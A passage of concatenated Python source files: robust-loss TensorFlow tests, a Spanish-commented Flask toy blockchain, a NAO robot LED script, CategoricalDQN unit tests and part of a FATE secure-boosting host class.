x = float_dtype(np.random.normal(size=num_samples))
# Uniformly distributed values in (-16, 3), quantized to the nearest 0.1
# to ensure that we hit the special cases at 0, 2.
alpha = float_dtype(
np.round(np.random.uniform(-16, 3, num_samples) * 10) / 10.)
# Push the sampled alphas at the extents of the range to +/- infinity, so
# that we probe those cases too.
alpha[alpha == 3.] = float_dtype(float('inf'))
alpha[alpha == -16.] = -float_dtype(float('inf'))
# Random log-normally distributed values in approx (1e-5, 100000):
scale = float_dtype(
np.exp(np.random.normal(size=num_samples) * 4.) + 1e-5)
# Compute the loss and its derivative with respect to all three inputs.
x_ph = tf.placeholder(x.dtype, num_samples)
alpha_ph = tf.placeholder(alpha.dtype, num_samples)
scale_ph = tf.placeholder(scale.dtype, num_samples)
lossfun_ph = general.lossfun(x_ph, alpha_ph, scale_ph)
loss, (d_x, d_alpha, d_scale) = sess.run(
(lossfun_ph,
tf.gradients(tf.reduce_sum(lossfun_ph),
(x_ph, alpha_ph, scale_ph))), {
x_ph: x,
alpha_ph: alpha,
scale_ph: scale,
})
return (num_samples, loss, x, alpha, scale, d_x, d_alpha, d_scale)
def _lossfun_preserves_dtype(self, float_dtype):
"""Check the loss's output has the same precision as its input."""
n = 16
x = float_dtype(np.random.normal(size=n))
alpha = float_dtype(np.random.normal(size=n))
scale = float_dtype(np.exp(np.random.normal(size=n)))
with self.session():
y = general.lossfun(x, alpha, scale).eval()
self.assertDTypeEqual(y, float_dtype)
def testLossfunPreservesDtypeSingle(self):
self._lossfun_preserves_dtype(np.float32)
def testLossfunPreservesDtypeDouble(self):
self._lossfun_preserves_dtype(np.float64)
def _derivative_is_monotonic_wrt_x(self, float_dtype):
# Check that the loss increases monotonically with |x|.
_, _, x, alpha, _, d_x, _, _ = self._precompute_lossfun_inputs(float_dtype)
d_x[~np.isfinite(d_x)] = 0 # This is just to suppress a warning below.
mask = np.isfinite(alpha) & (
np.abs(d_x) > (100. * np.finfo(float_dtype).eps))
self.assertAllEqual(np.sign(d_x[mask]), np.sign(x[mask]))
def testDerivativeIsMonotonicWrtXSingle(self):
self._derivative_is_monotonic_wrt_x(np.float32)
def testDerivativeIsMonotonicWrtXDouble(self):
self._derivative_is_monotonic_wrt_x(np.float64)
def _loss_is_near_zero_at_origin(self, float_dtype):
# Check that the loss is near-zero when x is near-zero.
_, loss, x, _, _, _, _, _ = self._precompute_lossfun_inputs(float_dtype)
self.assertTrue(np.all(np.abs(loss[np.abs(x) < 1e-5]) < 1e-5))
def testLossIsNearZeroAtOriginSingle(self):
self._loss_is_near_zero_at_origin(np.float32)
def testLossIsNearZeroAtOriginDouble(self):
self._loss_is_near_zero_at_origin(np.float64)
def _loss_is_quadratic_near_origin(self, float_dtype):
# Check that the loss is well-approximated by a quadratic bowl when
# |x| < scale
_, loss, x, _, scale, _, _, _ = self._precompute_lossfun_inputs(float_dtype)
mask = np.abs(x) < (0.5 * scale)
loss_quad = 0.5 * np.square(x / scale)
self.assertAllClose(loss_quad[mask], loss[mask], rtol=1e-5, atol=1e-2)
def testLossIsQuadraticNearOriginSingle(self):
self._loss_is_quadratic_near_origin(np.float32)
def testLossIsQuadraticNearOriginDouble(self):
self._loss_is_quadratic_near_origin(np.float64)
def _loss_is_bounded_when_alpha_is_negative(self, float_dtype):
# Assert that loss < (alpha - 2)/alpha when alpha < 0.
_, loss, _, alpha, _, _, _, _ = self._precompute_lossfun_inputs(float_dtype)
mask = alpha < 0.
min_val = np.finfo(float_dtype).min
alpha_clipped = np.maximum(min_val, alpha[mask])
self.assertTrue(
np.all(loss[mask] <= ((alpha_clipped - 2.) / alpha_clipped)))
def testLossIsBoundedWhenAlphaIsNegativeSingle(self):
self._loss_is_bounded_when_alpha_is_negative(np.float32)
def testLossIsBoundedWhenAlphaIsNegativeDouble(self):
self._loss_is_bounded_when_alpha_is_negative(np.float64)
def _derivative_is_bounded_when_alpha_is_below_2(self, float_dtype):
# Assert that |d_x| < |x|/scale^2 when alpha <= 2.
_, _, x, alpha, scale, d_x, _, _ = self._precompute_lossfun_inputs(
float_dtype)
mask = np.isfinite(alpha) & (alpha <= 2)
self.assertTrue(
np.all((np.abs(d_x[mask]) <=
((np.abs(x[mask]) +
(100. * np.finfo(float_dtype).eps)) / scale[mask]**2))))
def testDerivativeIsBoundedWhenAlphaIsBelow2Single(self):
self._derivative_is_bounded_when_alpha_is_below_2(np.float32)
def testDerivativeIsBoundedWhenAlphaIsBelow2Double(self):
self._derivative_is_bounded_when_alpha_is_below_2(np.float64)
def _derivative_is_bounded_when_alpha_is_below_1(self, float_dtype):
# Assert that |d_x| < 1/scale when alpha <= 1.
_, _, _, alpha, scale, d_x, _, _ = self._precompute_lossfun_inputs(
float_dtype)
mask = np.isfinite(alpha) & (alpha <= 1)
self.assertTrue(
np.all((np.abs(d_x[mask]) <=
((1. + (100. * np.finfo(float_dtype).eps)) / scale[mask]))))
def testDerivativeIsBoundedWhenAlphaIsBelow1Single(self):
self._derivative_is_bounded_when_alpha_is_below_1(np.float32)
def testDerivativeIsBoundedWhenAlphaIsBelow1Double(self):
self._derivative_is_bounded_when_alpha_is_below_1(np.float64)
def _alpha_derivative_is_positive(self, float_dtype):
# Assert that d_loss / d_alpha > 0.
_, _, _, alpha, _, _, d_alpha, _ = self._precompute_lossfun_inputs(
float_dtype)
mask = np.isfinite(alpha)
self.assertTrue(np.all(d_alpha[mask] > (-100. * np.finfo(float_dtype).eps)))
def testAlphaDerivativeIsPositiveSingle(self):
self._alpha_derivative_is_positive(np.float32)
def testAlphaDerivativeIsPositiveDouble(self):
self._alpha_derivative_is_positive(np.float64)
def _scale_derivative_is_negative(self, float_dtype):
# Assert that d_loss / d_scale < 0.
_, _, _, alpha, _, _, _, d_scale = self._precompute_lossfun_inputs(
float_dtype)
mask = np.isfinite(alpha)
self.assertTrue(np.all(d_scale[mask] < (100. * np.finfo(float_dtype).eps)))
def testScaleDerivativeIsNegativeSingle(self):
self._scale_derivative_is_negative(np.float32)
def testScaleDerivativeIsNegativeDouble(self):
self._scale_derivative_is_negative(np.float64)
def _loss_is_scale_invariant(self, float_dtype):
# Check that loss(mult * x, alpha, mult * scale) == loss(x, alpha, scale)
(num_samples, loss, x, alpha, scale, _, _,
_) = self._precompute_lossfun_inputs(float_dtype)
with self.session() as sess:
# Random log-normally distributed scalings in ~(0.2, 20)
mult = float_dtype(
np.maximum(0.2, np.exp(np.random.normal(size=num_samples))))
# Compute the scaled loss.
x_ph = tf.placeholder(x.dtype, num_samples)
alpha_ph = tf.placeholder(alpha.dtype, num_samples)
scale_ph = tf.placeholder(scale.dtype, num_samples)
lossfun_ph = general.lossfun(x_ph, alpha_ph, scale_ph)
loss_scaled = sess.run(lossfun_ph, {
x_ph: mult * x,
scale_ph: mult * scale,
alpha_ph: alpha
})
self.assertAllClose(loss, loss_scaled, atol=1e-4, rtol=1e-4)
def testLossIsScaleInvariantSingle(self):
self._loss_is_scale_invariant(np.float32)
def testLossIsScaleInvariantDouble(self):
self._loss_is_scale_invariant(np.float64)
def _alpha_equals_negative_infinity(self, float_dtype):
# Check that alpha == -Infinity reproduces Welsch aka Leclerc loss.
with self.session():
x = np.arange(-20, 20, 0.1, float_dtype)
alpha = float_dtype(-float('inf'))
scale = float_dtype(1.7)
# Our loss.
loss = general.lossfun(x, alpha, scale).eval()
# Welsch/Leclerc loss.
loss_true = (1. - tf.math.exp(-0.5 * tf.square(x / scale))).eval()
self._assert_all_close_according_to_type(loss, loss_true)
def testAlphaEqualsNegativeInfinitySingle(self):
self._alpha_equals_negative_infinity(np.float32)
def testAlphaEqualsNegativeInfinityDouble(self):
self._alpha_equals_negative_infinity(np.float64)
def _alpha_equals_negative_two(self, float_dtype):
# Check that alpha == -2 reproduces Geman-McClure loss.
with self.session():
x = np.arange(-20, 20, 0.1, float_dtype)
alpha = float_dtype(-2.)
scale = float_dtype(1.7)
# Our loss.
loss = general.lossfun(x, alpha, scale).eval()
# Geman-McClure loss.
loss_true = (
2. * tf.square(x / scale) / (tf.square(x / scale) + 4.)).eval()
self._assert_all_close_according_to_type(loss, loss_true)
def testAlphaEqualsNegativeTwoSingle(self):
self._alpha_equals_negative_two(np.float32)
def testAlphaEqualsNegativeTwoDouble(self):
self._alpha_equals_negative_two(np.float64)
def _alpha_equals_zero(self, float_dtype):
# Check that alpha == 0 reproduces Cauchy aka Lorentzian loss.
with self.session():
x = np.arange(-20, 20, 0.1, float_dtype)
alpha = float_dtype(0.)
scale = float_dtype(1.7)
# Our loss.
loss = general.lossfun(x, alpha, scale).eval()
# Cauchy/Lorentzian loss.
loss_true = (tf.log(0.5 * tf.square(x / scale) + 1.)).eval()
self._assert_all_close_according_to_type(loss, loss_true)
def testAlphaEqualsZeroSingle(self):
self._alpha_equals_zero(np.float32)
def testAlphaEqualsZeroDouble(self):
self._alpha_equals_zero(np.float64)
def _alpha_equals_one(self, float_dtype):
# Check that alpha == 1 reproduces Charbonnier aka pseudo-Huber loss.
with self.session():
x = np.arange(-20, 20, 0.1, float_dtype)
alpha = float_dtype(1.)
scale = float_dtype(1.7)
# Our loss.
loss = general.lossfun(x, alpha, scale).eval()
# Charbonnier loss.
loss_true = (tf.sqrt(tf.square(x / scale) + 1.) - 1.).eval()
self._assert_all_close_according_to_type(loss, loss_true)
def testAlphaEqualsOneSingle(self):
self._alpha_equals_one(np.float32)
def testAlphaEqualsOneDouble(self):
self._alpha_equals_one(np.float64)
def _alpha_equals_two(self, float_dtype):
# Check that alpha == 2 reproduces L2 loss.
with self.session():
x = np.arange(-20, 20, 0.1, float_dtype)
alpha = float_dtype(2.)
scale = float_dtype(1.7)
# Our loss.
loss = general.lossfun(x, alpha, scale).eval()
# L2 Loss.
loss_true = (0.5 * tf.square(x / scale)).eval()
self._assert_all_close_according_to_type(loss, loss_true)
def testAlphaEqualsTwoSingle(self):
self._alpha_equals_two(np.float32)
def testAlphaEqualsTwoDouble(self):
self._alpha_equals_two(np.float64)
def _alpha_equals_four(self, float_dtype):
# Check that alpha == 4 reproduces a quartic.
with self.session():
x = np.arange(-20, 20, 0.1, float_dtype)
alpha = float_dtype(4.)
scale = float_dtype(1.7)
# Our loss.
loss = general.lossfun(x, alpha, scale).eval()
# The true loss.
loss_true = (tf.square(tf.square(x / scale)) / 8. +
tf.square(x / scale) / 2.).eval()
self._assert_all_close_according_to_type(loss, loss_true)
def testAlphaEqualsFourSingle(self):
self._alpha_equals_four(np.float32)
def testAlphaEqualsFourDouble(self):
self._alpha_equals_four(np.float64)
def _alpha_equals_infinity(self, float_dtype):
# Check that alpha == Infinity takes the correct form.
with self.session():
x = np.arange(-20, 20, 0.1, float_dtype)
alpha = float_dtype(float('inf'))
scale = float_dtype(1.7)
# Our loss.
loss = general.lossfun(x, alpha, scale).eval()
# The true loss.
loss_true = (tf.math.exp(0.5 * tf.square(x / scale)) - 1.).eval()
self._assert_all_close_according_to_type(loss, loss_true)
def testAlphaEqualsInfinitySingle(self):
self._alpha_equals_infinity(np.float32)
def testAlphaEqualsInfinityDouble(self):
self._alpha_equals_infinity(np.float64)
def _approximate_loss_is_accurate(self, float_dtype):
# Check that the approximate loss (lossfun() with epsilon=1e-6) reasonably
# approximates the true loss (lossfun() with epsilon=0.) for a range of
# values of alpha (skipping alpha=0, where the approximation is poor).
with self.session():
x = np.arange(-10, 10, 0.1, float_dtype)
scale = float_dtype(1.7)
for alpha in [-4, -2, -0.2, -0.01, 0.01, 0.2, 1, 1.99, 2, 2.01, 4]:
alpha = float_dtype(alpha)
loss = general.lossfun(x, alpha, scale).eval()
loss_approx = general.lossfun(x, alpha, scale, approximate=True).eval()
self.assertAllClose(
loss, loss_approx, rtol=1e-5, atol=1e-4, msg='alpha=%g' % (alpha))
def testApproximateLossIsAccurateSingle(self):
self._approximate_loss_is_accurate(np.float32)
def testApproximateLossIsAccurateDouble(self):
self._approximate_loss_is_accurate(np.float64)
def _loss_and_gradients_are_finite(self, float_dtype):
# Test that the loss and its approximation both give finite losses and
# derivatives everywhere that they should for a wide range of values.
for approximate in [False, True]:
with self.session() as sess:
num_samples = 100000
# Normally distributed inputs.
x = float_dtype(np.random.normal(size=num_samples))
# Uniformly distributed values in (-16, 3), quantized to the nearest
# 0.1 to ensure that we hit the special cases at 0, 2.
alpha = float_dtype(
np.round(np.random.uniform(-16, 3, num_samples) * 10) / 10.)
# Random log-normally distributed values in approx (1e-5, 100000):
scale = float_dtype(
np.exp(np.random.normal(size=num_samples) * 4.) + 1e-5)
# Compute the loss and its derivative with respect to all three inputs.
x_ph = tf.placeholder(x.dtype, num_samples)
alpha_ph = tf.placeholder(alpha.dtype, num_samples)
scale_ph = tf.placeholder(scale.dtype, num_samples)
lossfun_ph = general.lossfun(
x_ph, alpha_ph, scale_ph, approximate=approximate)
loss, (d_x, d_alpha, d_scale) = sess.run(
(lossfun_ph,
tf.gradients(
tf.reduce_sum(lossfun_ph), (x_ph, alpha_ph, scale_ph))), {
x_ph: x,
scale_ph: scale,
alpha_ph: alpha
})
for v in [loss, d_x, d_alpha, d_scale]:
self.assertTrue(np.all(np.isfinite(v)))
def testLossAndGradientsAreFiniteSingle(self):
self._loss_and_gradients_are_finite(np.float32)
def testLossAndGradientsAreFiniteDouble(self):
self._loss_and_gradients_are_finite(np.float64)
def _gradient_matches_finite_differences(self, float_dtype):
# Test that the loss and its approximation both return gradients that are
# close to the numerical gradient from finite differences, with forward
# differencing. Returning correct gradients is TensorFlow's job, so this is
# just an aggressive sanity check in case some implementation detail causes
# gradients to incorrectly go to zero due to quantization or stop_gradients
# in some op that is used by the loss.
for approximate in [False, True]:
with self.session() as sess:
num_samples = 100000
# Normally distributed inputs.
x = float_dtype(np.random.normal(size=num_samples))
# Uniformly distributed values in (-16, 3), quantized to the nearest
# 0.1 and then shifted by 0.05 so that we avoid the special cases at
# 0 and 2 where the analytical gradient wont match finite differences.
alpha = float_dtype(
np.round(np.random.uniform(-16, 3, num_samples) * 10) / 10.)
# Random uniformy distributed values in [0.5, 1.5]
scale = float_dtype(np.random.uniform(0.5, 1.5, num_samples))
# Compute the loss and its derivative with respect to all three inputs.
x_ph = tf.placeholder(x.dtype, num_samples)
alpha_ph = tf.placeholder(alpha.dtype, num_samples)
scale_ph = tf.placeholder(scale.dtype, num_samples)
lossfun_ph = general.lossfun(
x_ph, alpha_ph, scale_ph, approximate=approximate)
loss, (d_x, d_alpha, d_scale) = sess.run(
(lossfun_ph,
tf.gradients(
tf.reduce_sum(lossfun_ph), (x_ph, alpha_ph, scale_ph))), {
x_ph: x,
alpha_ph: alpha,
scale_ph: scale
})
step_size = float_dtype(1e-3)
# Assert that the 95th percentile of errors is <= 1e-2.
def assert_percentile_close(v1, v2):
self.assertLessEqual(np.percentile(np.abs(v1 - v2), 95), 1e-2)
n_x = (sess.run(lossfun_ph, {
x_ph: x + step_size,
alpha_ph: alpha,
scale_ph: scale
}) - loss) / step_size
assert_percentile_close(n_x, d_x)
n_alpha = (sess.run(lossfun_ph, {
x_ph: x,
alpha_ph: alpha + step_size,
scale_ph: scale
}) - loss) / step_size
assert_percentile_close(n_alpha, d_alpha)
n_scale = (sess.run(lossfun_ph, {
x_ph: x,
alpha_ph: alpha,
scale_ph: scale + step_size
}) - loss) / step_size
assert_percentile_close(n_scale, d_scale)
def testGradientMatchesFiniteDifferencesSingle(self):
self._gradient_matches_finite_differences(np.float32)
def testGradientMatchesFiniteDifferencesDouble(self):
self._gradient_matches_finite_differences(np.float64)
if __name__ == '__main__':
tf.test.main()
|
the-stack_106_19097
|
from crypt import methods
import datetime
import hashlib
import json
from flask import Flask, jsonify, request
import requests
from uuid import uuid4
from urllib.parse import urlparse
# CREACIÓN DE UNA CADENA DE BLOQUES
class Blockchain:
def __init__(self) -> None:
self.chain = []
self.transactions = []
self.create_block(proof=1, previous_hash='0')
# El listado de nodos donde va a operar nuestra blockchain, no va a existir un
# orden. Por eso se usa el set en lugar de una lista
self.nodes = set()
def create_block(self, proof: int, previous_hash: str):
block = {
'index': len(self.chain)+1,
'timestamp': str(datetime.datetime.now()),
'proof': proof,
'previous_hash': previous_hash,
'transactions': self.transactions
}
self.transactions = []
self.chain.append(block)
return block
def get_previous_block(self):
return self.chain[-1]
def proof_of_work(self, previous_proof):
new_proof = 1
check_proof = False
while check_proof is False:
hash_operation = hashlib.sha256(str(new_proof**3-previous_proof**2+(new_proof**(1/2)-previous_proof**(1/2))).encode()).hexdigest()
if hash_operation[:4] == '0000':
check_proof = True
else:
new_proof += 1
return new_proof
def hash(self, block):
"""
Dado un bloque, devuelve el hash correspondiente al mismo
"""
encoded_block = json.dumps(block, sort_keys=True).encode()
return hashlib.sha256(encoded_block).hexdigest()
def is_chain_valid(self, chain):
"""
Se va a ir comprobando desde el bloque 0 (Génesis)
que todos los bloques siguientes están correctos
"""
previous_block = chain[0]
block_index = 1
# Bucle while para ir iterando desde el primer hasta el último bloque
while block_index < len(chain):
block = chain[block_index]
# Comparamos si el hash_previo del bloque actual es igual al hash
# del bloque previo
if block.get('previous_hash') != self.hash(previous_block):
return False
previous_proof = previous_block.get('proof')
proof = block.get('proof')
hash_operation = hashlib.sha256(str(proof**3-previous_proof**2+(proof**(1/2)-previous_proof**(1/2))).encode()).hexdigest()
# Comprobamos si el hash es correcto entre el bloque actual y
# el previo
if hash_operation[:4] != '0000':
return False
# Actualizamos el bloque previo por el actual y aumentamos el
# índice en 1 posición para comprobar el siguiente bloque
previous_block = block
block_index += 1
return True
def add_transaction(self, sender, receiver, amount):
"""
sender: Emisor de la transacción
receive: Receptor de la transacción
amount: Cantidad de la transacción
Va a devolver el identificador el bloque para el que se están
recogiendo las transacciones
"""
self.transactions.append({
'sender': sender,
'receiver': receiver,
'amount': amount
})
return self.get_previous_block()['index'] + 1
def add_node (self, address):
"""
Añadirá un nodo dada una dirección a la lista de nodos
address: dirección del nuevo nodo
"""
# Se crea un objeto de tipo URL Parse que tiene varios atributos
# sobre la URL
parsed_url = urlparse(address)
# Nos quedamo solamente con la dirección. Se suprime el http o argumentos
# que pueda tener la URL
self.nodes.add(parsed_url.netloc)
def replace_chain(self):
"""
Función que se usará cuando un minero haya minado un bloque, y por lo tanto
la cadena actual será más larga que la anterior. Por lo tanto, todos los
demás mineros deberá actualizar la cadena por la nueva resultante
"""
network = self.nodes
longest_chain = None
max_length = len(self.chain)
# Recorremos toda la red y le vamos consultando a los mineros las
# longitudes de sus cadenas
for node in network:
response = requests.get(f'http://{node}/get_chain')
if response.status_code == 200:
length = response.json()['length']
chain = response.json()['chain']
# Si la longitud de una caden sobrepasa el valor actual máximo
# y el bloque es válido, se actualiza
if length > max_length and self.is_chain_valid(chain):
max_length = length
longest_chain = chain
# Si al finalizar el bucle se ha encontrado alguna cadena mayor a la
# actualla reemplazamos y devolvemos True ya que se ha reemplazado la
# cadena
if longest_chain:
self.chain = longest_chain
return True
# En caso contrario devolvemos False ya que no se habría reemplazado
# la cadena
return False
# MINADO DE BLOQUES DE LA CADENA
# Creación de aplicación web
app = Flask(__name__)
# Crear la dirección del nodo en el puerto 5000
node_address = str(uuid4()).replace('-','')
# Creamos una instancia de la clase Blockchain
blockchain = Blockchain()
# Minado de un nuevo bloque
@app.route('/mine_block', methods=['GET'])
def mine_block():
previous_block = blockchain.get_previous_block()
previous_proof = previous_block.get('proof')
proof = blockchain.proof_of_work(previous_proof)
previous_hash = blockchain.hash(previous_block)
blockchain.add_transaction(sender=node_address,
receiver='Javier',
amount=1)
block = blockchain.create_block(proof, previous_hash)
response = {'message': 'Congrats. You have mine a new block',
'index': block.get('index'),
'timestamp': block.get('timestamp'),
'proof': block.get('proof'),
'previous_hash': block.get('previous_hash'),
'transactions': block.get('transactions')
}
return jsonify(response), 200
# Obtener la cadena de bloques
@app.route('/get_chain', methods=['GET'])
def get_chain():
response = {'chain': blockchain.chain,
'length': len(blockchain.chain)
}
return jsonify(response), 200
# Comprueba si la cadena de bloques es válida
@app.route('/is_valid', methods=['GET'])
def is_valid():
valid = blockchain.is_chain_valid(blockchain.chain)
if valid:
message = 'The blockchain is valid'
else:
message = 'Ups. This blockchain is not valid'
response = {'message': message}
return jsonify(response), 200
@app.route('/add_transaction', methods=['POST'])
def add_transaction():
json = request.get_json()
transaction_keys = ['sender', 'receiver', 'amount']
if not all(key in json for key in transaction_keys):
return 'Transacción incompleta. Faltan elementos', 400
index = blockchain.add_transaction(sender=json['sender'],
receiver=json['receiver'],
amount=json['amount']
)
response = {'message': f'La transacción será añadida al bloque {index}'}
return jsonify(response), 201
# DESCENTRALIZAR LA CADENA DE BLOQUES
# Para convertir la Cadena de Bloques en Criptomoneda se tiene que añadir:
# - Añadir campo para las transacciones
# - Añadir campo para el consenso
# Conectar nuevos nodos
@app.route('/connect_node', methods=['POST'])
def connect_node():
"""
Por POST se va a pasar una lista de uno o varios nodos a dar de alta
"""
json = request.get_json()
nodes = json.get('nodes')
if len(nodes) is None:
return 'No se ha añadido ningún nodo', 400
# En caso de que haya bloques que añadir, se van dando de alta
for node in nodes:
blockchain.add_node(address=node)
response = {'message': 'Nodes connected successfully',
'total_nodes': list(blockchain.nodes)}
return jsonify(response, 201)
# Reemplazo de cadenas en caso de que haya una nueva cadena más larga
@app.route('/replace_chain', methods=['GET'])
def replace_chain():
is_chain_replaced = blockchain.replace_chain()
if is_chain_replaced:
message = 'The chain has been updated'
else:
message = 'The chain is okay, it is not neccesary to be updated'
response = {'message': message,
'chain': blockchain.chain}
return jsonify(response), 200
# Ejecutar la app
app.run(host='0.0.0.0', port=5000)
|
the-stack_106_19099
|
from naoqi import ALProxy
import sys
import math
import random
import time
args = sys.argv
IP = args[1]
PORT = int(args[2])
try:
leds = ALProxy("ALLeds", IP, PORT)
except Exception as e:
quit()
def onLed(group, r, g, b, duration):
# file:///Applications/Choregraphe.app/Contents/Resources/share/doc/naoqi/sensors/alleds.html
leds.fadeRGB(group, r, g, b, duration)
pass
onLed('RightFaceLeds', 0, 0, 0, 0.0)
onLed('LeftFaceLeds', 0, 0, 0, 0.0)
onLed('ChestLeds', 0, 0, 0, 0.0)
onLed('RightEarLeds', 0, 0, 0, 0.0)
onLed('LeftEarLeds', 0, 0, 0, 0.0)
# time.sleep(0.5)
|
the-stack_106_19101
|
# Copyright 2020,2021 Sony Corporation.
# Copyright 2021 Sony Group Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import pytest
import nnabla as nn
import nnabla_rl.algorithms as A
import nnabla_rl.environments as E
from nnabla_rl.replay_buffer import ReplayBuffer
class TestCategoricalDQN(object):
def setup_method(self, method):
nn.clear_parameters()
def test_algorithm_name(self):
dummy_env = E.DummyDiscreteImg()
categorical_dqn = A.CategoricalDQN(dummy_env)
assert categorical_dqn.__name__ == 'CategoricalDQN'
def test_continuous_action_env_unsupported(self):
'''
Check that error occurs when training on continuous action env
'''
dummy_env = E.DummyContinuous()
config = A.CategoricalDQNConfig()
with pytest.raises(Exception):
A.CategoricalDQN(dummy_env, config=config)
def test_run_online_training(self):
'''
Check that no error occurs when calling online training
'''
dummy_env = E.DummyDiscreteImg()
config = A.CategoricalDQNConfig()
config.start_timesteps = 5
config.batch_size = 5
config.learner_update_frequency = 1
config.target_update_frequency = 1
categorical_dqn = A.CategoricalDQN(dummy_env, config=config)
categorical_dqn.train_online(dummy_env, total_iterations=10)
def test_run_online_training_multistep(self):
'''
Check that no error occurs when calling online training
'''
dummy_env = E.DummyDiscreteImg()
config = A.CategoricalDQNConfig()
config.num_steps = 2
config.start_timesteps = 5
config.batch_size = 5
config.learner_update_frequency = 1
config.target_update_frequency = 1
categorical_dqn = A.CategoricalDQN(dummy_env, config=config)
categorical_dqn.train_online(dummy_env, total_iterations=10)
def test_run_offline_training(self):
'''
Check that no error occurs when calling offline training
'''
batch_size = 5
dummy_env = E.DummyDiscreteImg()
config = A.CategoricalDQNConfig(batch_size=batch_size)
categorical_dqn = A.CategoricalDQN(dummy_env, config=config)
experiences = generate_dummy_experiences(dummy_env, batch_size)
buffer = ReplayBuffer()
buffer.append_all(experiences)
categorical_dqn.train_offline(buffer, total_iterations=10)
def test_compute_eval_action(self):
dummy_env = E.DummyDiscreteImg()
categorical_dqn = A.CategoricalDQN(dummy_env)
state = dummy_env.reset()
state = np.float32(state)
action = categorical_dqn.compute_eval_action(state)
assert action.shape == (1, )
def test_latest_iteration_state(self):
'''
Check that latest iteration state has the keys and values we expected
'''
dummy_env = E.DummyDiscreteImg()
categorical_dqn = A.CategoricalDQN(dummy_env)
categorical_dqn._model_trainer_state = {'cross_entropy_loss': 0., 'td_errors': np.array([0., 1.])}
latest_iteration_state = categorical_dqn.latest_iteration_state
assert 'cross_entropy_loss' in latest_iteration_state['scalar']
assert 'td_errors' in latest_iteration_state['histogram']
assert latest_iteration_state['scalar']['cross_entropy_loss'] == 0.
assert np.allclose(latest_iteration_state['histogram']['td_errors'], np.array([0., 1.]))
if __name__ == "__main__":
from testing_utils import generate_dummy_experiences
pytest.main()
else:
from ..testing_utils import generate_dummy_experiences
|
the-stack_106_19103
|
from typing import List
import functools
import copy
import numpy as np
from scipy import sparse as sp
from federatedml.util import LOGGER
from federatedml.util import consts
from federatedml.protobuf.generated.boosting_tree_model_meta_pb2 import BoostingTreeModelMeta
from federatedml.protobuf.generated.boosting_tree_model_meta_pb2 import QuantileMeta
from federatedml.protobuf.generated.boosting_tree_model_param_pb2 import BoostingTreeModelParam
from federatedml.ensemble.boosting.boosting_core import HeteroBoostingHost
from federatedml.param.boosting_param import HeteroSecureBoostParam, DecisionTreeParam
from federatedml.ensemble.basic_algorithms import HeteroDecisionTreeHost
from federatedml.transfer_variable.transfer_class.hetero_secure_boosting_predict_transfer_variable import \
HeteroSecureBoostTransferVariable
from federatedml.util.io_check import assert_io_num_rows_equal
from federatedml.util.anonymous_generator import generate_anonymous
from federatedml.feature.fate_element_type import NoneType
class HeteroSecureBoostingTreeHost(HeteroBoostingHost):
def __init__(self):
super(HeteroSecureBoostingTreeHost, self).__init__()
self.use_missing = False
self.zero_as_missing = False
self.cur_epoch_idx = -1
self.grad_and_hess = None
self.tree_param = DecisionTreeParam() # decision tree param
self.model_param = HeteroSecureBoostParam()
self.complete_secure = False
self.model_name = 'HeteroSecureBoost'
self.enable_goss = False
self.cipher_compressing = False
self.max_sample_weight = None
self.round_decimal = None
self.new_ver = True
# for fast hist
self.sparse_opt_para = False
self.run_sparse_opt = False
self.has_transformed_data = False
self.data_bin_dense = None
self.predict_transfer_inst = HeteroSecureBoostTransferVariable()
def _init_model(self, param: HeteroSecureBoostParam):
super(HeteroSecureBoostingTreeHost, self)._init_model(param)
self.tree_param = param.tree_param
self.use_missing = param.use_missing
self.enable_goss = param.run_goss
self.zero_as_missing = param.zero_as_missing
self.complete_secure = param.complete_secure
self.sparse_opt_para = param.sparse_optimization
self.round_decimal = param.cipher_compress_error
self.new_ver = param.new_ver
if self.use_missing:
self.tree_param.use_missing = self.use_missing
self.tree_param.zero_as_missing = self.zero_as_missing
@staticmethod
def sparse_to_array(data, feature_sparse_point_array, use_missing, zero_as_missing):
new_data = copy.deepcopy(data)
new_feature_sparse_point_array = copy.deepcopy(feature_sparse_point_array)
for k, v in data.features.get_all_data():
if v == NoneType():
value = -1
else:
value = v
new_feature_sparse_point_array[k] = value
# as most sparse point is bin-0
# when mark it as a missing value (-1), offset it to make it sparse
if not use_missing or (use_missing and not zero_as_missing):
offset = 0
else:
offset = 1
new_data.features = sp.csc_matrix(np.array(new_feature_sparse_point_array) + offset)
return new_data
def check_run_sp_opt(self):
# if run fast hist, generate dense d_dtable and set related variables
self.run_sparse_opt = (self.encrypt_param.method.lower() == consts.ITERATIVEAFFINE.lower()) and \
self.sparse_opt_para
if self.run_sparse_opt:
LOGGER.info('host is running fast histogram mode')
# for fast hist computation, data preparation
if self.run_sparse_opt and not self.has_transformed_data:
# start data transformation for fast histogram mode
if not self.use_missing or (self.use_missing and not self.zero_as_missing):
feature_sparse_point_array = [self.bin_sparse_points[i] for i in range(len(self.bin_sparse_points))]
else:
feature_sparse_point_array = [-1 for i in range(len(self.bin_sparse_points))]
sparse_to_array = functools.partial(
HeteroSecureBoostingTreeHost.sparse_to_array,
feature_sparse_point_array=feature_sparse_point_array,
use_missing=self.use_missing,
zero_as_missing=self.zero_as_missing
)
self.data_bin_dense = self.data_bin.mapValues(sparse_to_array)
self.has_transformed_data = True
def fit_a_booster(self, epoch_idx: int, booster_dim: int):
self.check_run_sp_opt()
tree = HeteroDecisionTreeHost(tree_param=self.tree_param)
tree.init(flowid=self.generate_flowid(epoch_idx, booster_dim),
valid_features=self.sample_valid_features(),
data_bin=self.data_bin, bin_split_points=self.bin_split_points,
bin_sparse_points=self.bin_sparse_points,
run_sprase_opt=self.run_sparse_opt,
data_bin_dense=self.data_bin_dense,
runtime_idx=self.component_properties.local_partyid,
goss_subsample=self.enable_goss,
bin_num=self.bin_num,
complete_secure=True if (self.complete_secure and epoch_idx == 0) else False,
cipher_compressing=self.round_decimal is not None,
round_decimal=self.round_decimal,
new_ver=self.new_ver
)
tree.fit()
return tree
def load_booster(self, model_meta, model_param, epoch_idx, booster_idx):
tree = HeteroDecisionTreeHost(self.tree_param)
tree.load_model(model_meta, model_param)
tree.set_flowid(self.generate_flowid(epoch_idx, booster_idx))
tree.set_runtime_idx(self.component_properties.local_partyid)
return tree
def generate_summary(self) -> dict:
